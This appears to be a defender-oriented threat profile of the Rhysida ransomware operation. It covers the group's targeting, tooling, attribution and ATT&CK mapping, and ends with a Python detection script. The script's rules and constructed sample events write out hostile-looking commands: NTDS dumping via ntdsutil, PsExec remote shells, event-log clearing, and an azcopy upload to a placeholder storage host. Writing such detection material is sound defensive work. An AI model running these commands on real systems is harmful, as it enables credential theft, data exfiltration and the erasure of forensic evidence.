AI Draft ACTIVE

Rhysida

Affiliation: Cybercriminal (Ransomware)
Motivation: Financial
Status: Active
Country: Unknown
First Seen: 2023
Last Seen: 2025
Target Geographies: United States, Global

Executive Summary

Rhysida is a financially motivated ransomware operation that emerged in May 2023. The group operates as a ransomware-as-a-service (RaaS) affiliate model and pursues “targets of opportunity” across the education, healthcare, manufacturing, information technology, and government sectors. A November 2023 joint advisory from the FBI, CISA, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) disseminated Rhysida’s known indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs).

Open-source reporting has documented behavioral and infrastructure similarities between Rhysida operators and Vice Society (DEV-0832) actors. While these similarities have been noted in multiple vendor reports, they do not constitute confirmed group identity, and the available public evidence does not support treating Rhysida and Vice Society as interchangeable labels. Rhysida actors employ a double-extortion model: they encrypt victim data and simultaneously threaten to publish exfiltrated files on a Tor-based leak site unless a Bitcoin ransom is paid.

Notable Campaigns

2023–Present — Healthcare and Education Targeting

Rhysida has been observed targeting the healthcare and public health sector, prompting a specific sector alert from the U.S. Department of Health and Human Services (HHS). The group’s healthcare targeting has drawn government attention due to patient safety implications. CISA, FBI, and MS-ISAC investigations through December 2024 document a continuing operational pattern against healthcare organizations, with actors compromising VPN infrastructure and moving laterally before deploying the ransomware payload.

The education sector has also been a target, with Rhysida actors compromising universities and school districts using the same VPN-and-RDP lateral movement pattern documented in healthcare incidents. Government organizations and manufacturing firms have also been targeted.

2024–2025 — Continued Operations with Updated TTPs

CISA updated the Rhysida advisory in April 2025 to reflect new IOCs and TTPs employed by Rhysida associates, indicating the group remained operationally active through at least late 2024. Updated techniques include expanded use of AZCopy and Azure Storage Explorer for cloud-based data exfiltration, reflecting adaptation to cloud-based enterprise environments.

Technical Capabilities

Rhysida actors gain initial access primarily by authenticating to external-facing VPN services with compromised valid credentials. In some cases, Gootloader malware has been used for initial access. Once inside, actors conduct Active Directory reconnaissance using ADRecon and native tools including ipconfig, whoami, nltest, and net commands to enumerate domain structure and user accounts.

Lateral movement relies on RDP connections, PuTTY SSH tunneling, and PsExec for remote execution (T1569.002). Credential harvesting targets the NTDS.dit database, which is extracted via ntdsutil or secretsdump-style tooling, allowing actors to compromise domain-wide accounts. AnyDesk is deployed for persistent remote access.

Data staged for exfiltration is placed into designated "in" and "out" folders created on the C:\ drive. Exfiltration leverages AZCopy and Azure Storage Explorer to transfer collected data to actor-controlled cloud storage. Prior to deploying the ransomware payload, actors clear Windows event logs using wevtutil to hinder forensic investigation.

The Rhysida ransomware binary is a 64-bit Windows PE compiled with MinGW/GCC. It injects into running processes before encrypting files using a 4096-bit RSA key combined with the ChaCha20 algorithm, appending a .rhysida extension to encrypted files. A PDF ransom note is dropped on the compromised system. Following encryption, the binary deletes itself via PowerShell from a hidden command window. Ransom payments are demanded in Bitcoin to actor-provided wallet addresses.

Attribution

Rhysida is documented through joint FBI, CISA, and MS-ISAC investigations with published IOCs and TTPs. No specific country attribution appears in available public government reporting, and no individual Rhysida operators have been publicly indicted as of the most recent advisory update. Vendor reporting has noted behavioral similarities with Vice Society, but public evidence does not support confirmed group identity between the two.

Multiple independent government and vendor sources document this as a distinct operational cluster with consistent TTPs, but without a legal attribution or government country-level assignment.

MITRE ATT&CK Profile

Initial Access: Compromised valid credentials used to authenticate to VPN services (T1078); Gootloader malware for phishing-based initial access in some cases (T1566).

Discovery: Domain and network enumeration via ipconfig (T1016), whoami (T1033), nltest (T1482), and net commands (T1069.002); ADRecon for Active Directory reconnaissance.

Lateral Movement: Remote Desktop Protocol connections (T1021.001); PuTTY SSH tunneling (T1021.004); PsExec for remote execution (T1569.002).

Credential Access: NTDS.dit database dumping via ntdsutil (T1003.003) to extract domain-wide credential hashes.

Exfiltration: Data staged in local directories (T1074) before exfiltration via AZCopy and Azure Storage Explorer to actor-controlled cloud storage (T1567.002).

Command and Control: AnyDesk remote access tool (T1219) for persistent access.

Defense Evasion: Windows event log clearing via wevtutil (T1070); self-deletion of ransomware binary post-encryption (T1070.004); process injection prior to file encryption (T1055).

Impact: RSA-4096 + ChaCha20 data encryption (T1486); double extortion with threatened publication of exfiltrated data (T1657).
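The Technical Capabilities narrative and the ATT&CK profile above describe a chain of tooling (nltest, ntdsutil, PsExec, AnyDesk, AZCopy, wevtutil) that a defender can look for together in process-creation telemetry. The following detection sketch is an added example, not code from the advisory or from any vendor: it runs a small rule set over constructed `host=... cmdline=...` event lines (sample data, not real victim telemetry), maps each hit to the ATT&CK IDs listed on this page, and flags when several distinct stages of the chain appear together. The regexes and the event format are this example's own.

```python
import re

# (regex over the command line, ATT&CK ID from this page, label). Patterns are
# this example's approximations of the tooling named in the advisory. whoami and
# ipconfig (T1033/T1016) are deliberately omitted: far too noisy on their own.
RULES = [
    (re.compile(r"\bnltest(\.exe)?\b", re.I), "T1482", "nltest domain enumeration"),
    # ntdsutil is also used for legitimate DC maintenance: medium-confidence signal.
    (re.compile(r"\bntdsutil(\.exe)?\b", re.I), "T1003.003", "ntdsutil invocation (NTDS.dit access)"),
    (re.compile(r"\bpsexec(64)?(\.exe)?\b", re.I), "T1569.002", "PsExec remote execution"),
    (re.compile(r"\banydesk(\.exe)?\b", re.I), "T1219", "AnyDesk remote access tool"),
    (re.compile(r"\b(azcopy(\.exe)?|StorageExplorer(\.exe)?)\b", re.I), "T1567.002", "AZCopy / Storage Explorer"),
    (re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I), "T1070", "wevtutil log clearing"),
    (re.compile(r"\.rhysida\b", re.I), "T1486", ".rhysida file extension"),
]

EVENT_RE = re.compile(r"^host=(?P<host>\S+)\s+cmdline=(?P<cmdline>.*)$")

# Constructed sample telemetry (hosts, paths and the storage URL are placeholders).
SAMPLE_EVENTS = [
    "host=WS-017 cmdline=whoami /all",
    "host=WS-017 cmdline=nltest /dclist:corp.example",
    "host=DC-01 cmdline=ntdsutil.exe ifm",
    "host=WS-017 cmdline=psexec.exe \\\\FS-02 -s cmd.exe",
    "host=FS-02 cmdline=azcopy.exe copy C:\\out https://STORAGE-PLACEHOLDER.blob.core.windows.net/x --recursive",
    "host=FS-02 cmdline=wevtutil.exe cl Security",
    "host=WS-017 cmdline=notepad.exe C:\\Users\\a\\Desktop\\report.docx",  # benign noise
]

def parse_event(line):
    """Return (host, cmdline) for one constructed event line, or None if malformed."""
    m = EVENT_RE.match(line)
    return (m.group("host"), m.group("cmdline")) if m else None

def match_events(lines):
    """Return a list of (host, technique_id, label) for every rule hit."""
    hits = []
    for line in lines:
        parsed = parse_event(line)
        if parsed is None:
            continue
        host, cmdline = parsed
        hits.extend((host, tid, label) for rx, tid, label in RULES if rx.search(cmdline))
    return hits

def assess(hits, min_stages=3):
    """Distinct techniques seen across the estate; several together suggest the chain, not one-off admin use."""
    stages = sorted({tid for _, tid, _ in hits})
    return {"techniques": stages, "chain_suspected": len(stages) >= min_stages}

if __name__ == "__main__":
    for host, tid, label in match_events(SAMPLE_EVENTS):
        print(f"{host:8} {tid:10} {label}")
    print(assess(match_events(SAMPLE_EVENTS)))
```

Tuning the per-rule confidence (for example requiring the ntdsutil and wevtutil hits to come from hosts that are not domain controllers under maintenance) is left to the environment; the point is that the chain, not any single tool, is the signal.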

Sources & References